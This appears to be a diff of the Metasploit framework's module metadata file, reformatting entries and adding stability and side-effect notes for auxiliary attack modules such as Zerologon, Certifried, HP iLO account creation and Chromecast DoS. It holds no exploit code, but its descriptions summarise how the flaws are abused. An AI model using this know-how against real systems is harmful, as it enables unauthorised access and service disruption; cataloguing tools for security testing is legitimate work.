+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -320,9 +333,7 @@
"auxiliary_admin/aws/aws_launch_instances": {
"name": "Launches Hosts in AWS",
"fullname": "auxiliary/admin/aws/aws_launch_instances",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -337,14 +348,10 @@
"platform": "",
"arch": "",
"rport": 443,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/aws/aws_launch_instances.rb",
"is_install_path": true,
"ref_name": "admin/aws/aws_launch_instances",
@@ -352,19 +359,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/backupexec/dump": {
"name": "Veritas Backup Exec Windows Remote File Access",
"fullname": "auxiliary/admin/backupexec/dump",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -372,7 +382,7 @@
"hdm ",
"Unknown"
],
- "description": "This module abuses a logic flaw in the Backup Exec Windows Agent to download\n arbitrary files from the system. This flaw was found by someone who wishes to\n remain anonymous and affects all known versions of the Backup Exec Windows Agent. The\n output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program\n listed in the references section. To transfer an entire directory, specify a\n path that includes a trailing backslash.",
+ "description": "This module abuses a logic flaw in the Backup Exec Windows Agent to download\n arbitrary files from the system. This flaw was found by someone who wishes to\n remain anonymous and affects all known versions of the Backup Exec Windows Agent. The\n output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program\n listed in the references section. To transfer an entire directory, specify a\n path that includes a trailing backslash.",
"references": [
"CVE-2005-2611",
"OSVDB-18695",
@@ -382,14 +392,10 @@
"platform": "",
"arch": "",
"rport": 10000,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/backupexec/dump.rb",
"is_install_path": true,
"ref_name": "admin/backupexec/dump",
@@ -397,6 +403,13 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -410,16 +423,14 @@
"auxiliary_admin/backupexec/registry": {
"name": "Veritas Backup Exec Server Registry Access",
"fullname": "auxiliary/admin/backupexec/registry",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This modules exploits a remote registry access flaw in the BackupExec Windows\n Server RPC service. This vulnerability was discovered by Pedram Amini and is based\n on the NDR stub information posted to openrce.org.\n Please see the action list for the different attack modes.",
+ "description": "This modules exploits a remote registry access flaw in the BackupExec Windows\n Server RPC service. This vulnerability was discovered by Pedram Amini and is based\n on the NDR stub information posted to openrce.org.\n Please see the action list for the different attack modes.",
"references": [
"OSVDB-17627",
"CVE-2005-0771",
@@ -428,14 +439,10 @@
"platform": "",
"arch": "",
"rport": 6106,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/backupexec/registry.rb",
"is_install_path": true,
"ref_name": "admin/backupexec/registry",
@@ -443,6 +450,13 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -460,16 +474,14 @@
"auxiliary_admin/chromecast/chromecast_reset": {
"name": "Chromecast Factory Reset DoS",
"fullname": "auxiliary/admin/chromecast/chromecast_reset",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu "
],
- "description": "This module performs a factory reset on a Chromecast, causing a denial of service (DoS).\n No user authentication is required.",
+ "description": "This module performs a factory reset on a Chromecast, causing a denial of service (DoS).\n No user authentication is required.",
"references": [
"URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html"
],
@@ -492,7 +504,7 @@
"https"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/chromecast/chromecast_reset.rb",
"is_install_path": true,
"ref_name": "admin/chromecast/chromecast_reset",
@@ -500,6 +512,13 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-os-down"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -517,16 +536,14 @@
"auxiliary_admin/chromecast/chromecast_youtube": {
"name": "Chromecast YouTube Remote Control",
"fullname": "auxiliary/admin/chromecast/chromecast_youtube",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu "
],
- "description": "This module acts as a simple remote control for Chromecast YouTube.\n\n Only the deprecated DIAL protocol is supported by this module.\n Casting via the newer CASTV2 protocol is unsupported at this time.",
+ "description": "This module acts as a simple remote control for Chromecast YouTube.\n\n Only the deprecated DIAL protocol is supported by this module.\n Casting via the newer CASTV2 protocol is unsupported at this time.",
"references": [
"URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html"
],
@@ -549,7 +566,7 @@
"https"
],
"targets": null,
- "mod_time": "2019-05-29 12:19:52 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/chromecast/chromecast_youtube.rb",
"is_install_path": true,
"ref_name": "admin/chromecast/chromecast_youtube",
@@ -557,6 +574,14 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "screen-effects"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -574,9 +599,7 @@
"auxiliary_admin/citrix/citrix_netscaler_config_decrypt": {
"name": "Decrypt Citrix NetScaler Config Secrets",
"fullname": "auxiliary/admin/citrix/citrix_netscaler_config_decrypt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2022-05-19",
"type": "auxiliary",
@@ -591,12 +614,8 @@
"platform": "BSD",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2024-01-07 15:02:53 +0000",
"path": "/modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb",
@@ -628,9 +647,7 @@
"auxiliary_admin/db2/db2rcmd": {
"name": "IBM DB2 db2rcmd.exe Command Execution Vulnerability",
"fullname": "auxiliary/admin/db2/db2rcmd",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2004-03-04",
"type": "auxiliary",
@@ -655,7 +672,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2022-08-08 01:40:15 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/db2/db2rcmd.rb",
"is_install_path": true,
"ref_name": "admin/db2/db2rcmd",
@@ -663,19 +680,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/dcerpc/cve_2020_1472_zerologon": {
"name": "Netlogon Weak Cryptographic Authentication",
"fullname": "auxiliary/admin/dcerpc/cve_2020_1472_zerologon",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -717,9 +737,7 @@
"Stability": [
"crash-safe"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"SideEffects": [
"config-changes",
"ioc-in-logs"
@@ -741,9 +759,7 @@
"auxiliary_admin/dcerpc/cve_2022_26923_certifried": {
"name": "Active Directory Certificate Services (ADCS) privilege escalation (Certifried)",
"fullname": "auxiliary/admin/dcerpc/cve_2022_26923_certifried",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -771,7 +787,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2024-11-12 12:08:18 +0000",
+ "mod_time": "2025-06-04 11:22:26 +0000",
"path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb",
"is_install_path": true,
"ref_name": "admin/dcerpc/cve_2022_26923_certifried",
@@ -782,9 +798,7 @@
"AKA": [
"Certifried"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"Stability": [
"crash-safe"
],
@@ -812,9 +826,7 @@
"auxiliary_admin/dcerpc/icpr_cert": {
"name": "ICPR Certificate Management",
"fullname": "auxiliary/admin/dcerpc/icpr_cert",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -826,6 +838,7 @@
],
"description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n template's configuration the resulting certificate can be used for various operations such as authentication.\n PFX certificate files that are saved are encrypted with a blank password.\n\n This module is capable of exploiting ESC1, ESC2, ESC3, ESC13 and ESC15.",
"references": [
+ "URL-https://posts.specterops.io/certified-pre-owned-d95910965cd2",
"URL-https://github.com/GhostPack/Certify",
"URL-https://github.com/ly4k/Certipy"
],
@@ -841,7 +854,7 @@
"microsoft-ds"
],
"targets": null,
- "mod_time": "2024-12-16 14:55:10 +0000",
+ "mod_time": "2025-05-30 13:54:35 +0000",
"path": "/modules/auxiliary/admin/dcerpc/icpr_cert.rb",
"is_install_path": true,
"ref_name": "admin/dcerpc/icpr_cert",
@@ -849,12 +862,8 @@
"post_auth": false,
"default_credential": false,
"notes": {
- "Reliability": [
-
- ],
- "Stability": [
-
- ],
+ "Reliability": [],
+ "Stability": [],
"SideEffects": [
"ioc-in-logs"
],
@@ -912,12 +921,8 @@
"post_auth": false,
"default_credential": false,
"notes": {
- "Reliability": [
-
- ],
- "Stability": [
-
- ],
+ "Reliability": [],
+ "Stability": [],
"SideEffects": [
"ioc-in-logs"
],
@@ -952,9 +957,7 @@
"auxiliary_admin/dns/dyn_dns_update": {
"name": "DNS Server Dynamic Update Record Injection",
"fullname": "auxiliary/admin/dns/dyn_dns_update",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -972,14 +975,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/dns/dyn_dns_update.rb",
"is_install_path": true,
"ref_name": "admin/dns/dyn_dns_update",
@@ -987,6 +986,14 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -1008,16 +1015,14 @@
"auxiliary_admin/edirectory/edirectory_dhost_cookie": {
"name": "Novell eDirectory DHOST Predictable Session Cookie",
"fullname": "auxiliary/admin/edirectory/edirectory_dhost_cookie",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module is able to predict the next session cookie value issued\n by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run\n this module, wait until the real administrator logs in, then specify the\n predicted cookie value to hijack their session.",
+ "description": "This module is able to predict the next session cookie value issued\n by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run\n this module, wait until the real administrator logs in, then specify the\n predicted cookie value to hijack their session.",
"references": [
"CVE-2009-4655",
"OSVDB-60035"
@@ -1025,14 +1030,10 @@
"platform": "",
"arch": "",
"rport": 8030,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2018-07-08 19:00:11 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb",
"is_install_path": true,
"ref_name": "admin/edirectory/edirectory_dhost_cookie",
@@ -1040,19 +1041,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/edirectory/edirectory_edirutil": {
"name": "Novell eDirectory eMBox Unauthenticated File Access",
"fullname": "auxiliary/admin/edirectory/edirectory_edirutil",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -1061,7 +1063,7 @@
"MC ",
"sinn3r "
],
- "description": "This module will access Novell eDirectory's eMBox service and can run the\n following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,\n STOP_SERVICE, START_SERVICE, SET_LOGFILE.",
+ "description": "This module will access Novell eDirectory's eMBox service and can run the\n following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,\n STOP_SERVICE, START_SERVICE, SET_LOGFILE.",
"references": [
"CVE-2008-0926",
"BID-28441",
@@ -1086,7 +1088,7 @@
"https"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb",
"is_install_path": true,
"ref_name": "admin/edirectory/edirectory_edirutil",
@@ -1094,6 +1096,13 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -1127,9 +1136,7 @@
"auxiliary_admin/emc/alphastor_devicemanager_exec": {
"name": "EMC AlphaStor Device Manager Arbitrary Command Execution",
"fullname": "auxiliary/admin/emc/alphastor_devicemanager_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-05-27",
"type": "auxiliary",
@@ -1146,14 +1153,10 @@
"platform": "",
"arch": "",
"rport": 3000,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb",
"is_install_path": true,
"ref_name": "admin/emc/alphastor_devicemanager_exec",
@@ -1161,19 +1164,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/emc/alphastor_librarymanager_exec": {
"name": "EMC AlphaStor Library Manager Arbitrary Command Execution",
"fullname": "auxiliary/admin/emc/alphastor_librarymanager_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-05-27",
"type": "auxiliary",
@@ -1190,14 +1196,10 @@
"platform": "",
"arch": "",
"rport": 3500,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb",
"is_install_path": true,
"ref_name": "admin/emc/alphastor_librarymanager_exec",
@@ -1205,28 +1207,31 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/firetv/firetv_youtube": {
"name": "Amazon Fire TV YouTube Remote Control",
"fullname": "auxiliary/admin/firetv/firetv_youtube",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu "
],
- "description": "This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.",
+ "description": "This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.",
"references": [
- "URL-https://www.amazon.com/dp/B00CX5P8FC?_encoding=UTF8&showFS=1",
+ "URL-http://http://web.archive.org/web/20210301101536/http://www.amazon.com/dp/B00CX5P8FC/?_encoding=UTF8",
"URL-https://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs"
],
"platform": "",
@@ -1248,7 +1253,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/firetv/firetv_youtube.rb",
"is_install_path": true,
"ref_name": "admin/firetv/firetv_youtube",
@@ -1256,6 +1261,14 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "screen-effects"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -1273,9 +1286,7 @@
"auxiliary_admin/hp/hp_data_protector_cmd": {
"name": "HP Data Protector 6.1 EXEC_CMD Command Execution",
"fullname": "auxiliary/admin/hp/hp_data_protector_cmd",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-02-07",
"type": "auxiliary",
@@ -1285,7 +1296,7 @@
"wireghoul",
"sinn3r "
],
- "description": "This module exploits HP Data Protector's omniinet process, specifically\n against a Windows setup.\n\n When an EXEC_CMD packet is sent, omniinet.exe will attempt to look\n for that user-supplied filename with kernel32!FindFirstFileW(). If the file\n is found, the process will then go ahead execute it with CreateProcess()\n under a new thread. If the filename isn't found, FindFirstFileW() will throw\n an error (0x03), and then bails early without triggering CreateProcess().\n\n Because of these behaviors, if you try to supply an argument, FindFirstFileW()\n will look at that as part of the filename, and then bail.\n\n Please note that when you specify the 'CMD' option, the base path begins\n under C:\\.",
+ "description": "This module exploits HP Data Protector's omniinet process, specifically\n against a Windows setup.\n\n When an EXEC_CMD packet is sent, omniinet.exe will attempt to look\n for that user-supplied filename with kernel32!FindFirstFileW(). If the file\n is found, the process will then go ahead execute it with CreateProcess()\n under a new thread. If the filename isn't found, FindFirstFileW() will throw\n an error (0x03), and then bails early without triggering CreateProcess().\n\n Because of these behaviors, if you try to supply an argument, FindFirstFileW()\n will look at that as part of the filename, and then bail.\n\n Please note that when you specify the 'CMD' option, the base path begins\n under C:\\.",
"references": [
"CVE-2011-0923",
"OSVDB-72526",
@@ -1295,14 +1306,10 @@
"platform": "",
"arch": "",
"rport": 5555,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb",
"is_install_path": true,
"ref_name": "admin/hp/hp_data_protector_cmd",
@@ -1310,26 +1317,29 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/hp/hp_ilo_create_admin_account": {
"name": "HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation",
"fullname": "auxiliary/admin/hp/hp_ilo_create_admin_account",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-08-24",
"type": "auxiliary",
"author": [
"Fabien Perigaud "
],
- "description": "This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer\n overflow in the Connection HTTP header handling by the web server.\n Exploiting this vulnerability gives full access to the REST API, allowing arbitrary\n accounts creation.",
+ "description": "This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer\n overflow in the Connection HTTP header handling by the web server.\n Exploiting this vulnerability gives full access to the REST API, allowing arbitrary\n accounts creation.",
"references": [
"CVE-2017-12542",
"BID-100467",
@@ -1355,7 +1365,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb",
"is_install_path": true,
"ref_name": "admin/hp/hp_ilo_create_admin_account",
@@ -1363,19 +1373,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/hp/hp_imc_som_create_account": {
"name": "HP Intelligent Management SOM Account Creation",
"fullname": "auxiliary/admin/hp/hp_imc_som_create_account",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-10-08",
"type": "auxiliary",
@@ -1383,7 +1397,7 @@
"rgod ",
"juan vazquez "
],
- "description": "This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the AccountService RpcServiceServlet from the SOM component,\n in order to create a SOM account with Account Management permissions. This module has\n been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with\n SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.",
+ "description": "This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the AccountService RpcServiceServlet from the SOM component,\n in order to create a SOM account with Account Management permissions. This module has\n been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with\n SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.",
"references": [
"CVE-2013-4824",
"OSVDB-98249",
@@ -1410,7 +1424,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb",
"is_install_path": true,
"ref_name": "admin/hp/hp_imc_som_create_account",
@@ -1418,19 +1432,22 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/allegro_rompager_auth_bypass": {
"name": "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",
"fullname": "auxiliary/admin/http/allegro_rompager_auth_bypass",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-12-17",
"type": "auxiliary",
@@ -1465,7 +1482,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/allegro_rompager_auth_bypass",
@@ -1473,19 +1490,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/arris_motorola_surfboard_backdoor_xss": {
"name": "Arris / Motorola Surfboard SBG6580 Web Interface Takeover",
"fullname": "auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-04-08",
"type": "auxiliary",
@@ -1497,19 +1517,15 @@
"CVE-2015-0964",
"CVE-2015-0965",
"CVE-2015-0966",
- "URL-https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/"
+ "URL-http://web.archive.org/web/20220810083803/https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/"
],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb",
"is_install_path": true,
"ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss",
@@ -1517,6 +1533,14 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -1530,9 +1554,7 @@
"auxiliary_admin/http/atlassian_confluence_auth_bypass": {
"name": "Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control",
"fullname": "auxiliary/admin/http/atlassian_confluence_auth_bypass",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2023-10-04",
"type": "auxiliary",
@@ -1587,16 +1609,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/axigen_file_access": {
"name": "Axigen Arbitrary File Read and Delete",
"fullname": "auxiliary/admin/http/axigen_file_access",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-10-31",
"type": "auxiliary",
@@ -1629,7 +1647,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/axigen_file_access.rb",
"is_install_path": true,
"ref_name": "admin/http/axigen_file_access",
@@ -1637,6 +1655,13 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "os-resource-loss"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -1654,9 +1679,7 @@
"auxiliary_admin/http/cfme_manageiq_evm_pass_reset": {
"name": "Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection",
"fullname": "auxiliary/admin/http/cfme_manageiq_evm_pass_reset",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-11-12",
"type": "auxiliary",
@@ -1688,7 +1711,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/cfme_manageiq_evm_pass_reset",
@@ -1696,19 +1719,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/cisco_7937g_ssh_privesc": {
"name": "Cisco 7937G SSH Privilege Escalation",
"fullname": "auxiliary/admin/http/cisco_7937g_ssh_privesc",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-06-02",
"type": "auxiliary",
@@ -1723,12 +1750,8 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"path": "/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py",
@@ -1737,20 +1760,15 @@
"check": false,
"post_auth": true,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/cisco_ios_xe_cli_exec_cve_2023_20198": {
"name": "Cisco IOX XE unauthenticated Command Line Interface (CLI) execution",
"fullname": "auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2023-10-16",
"type": "auxiliary",
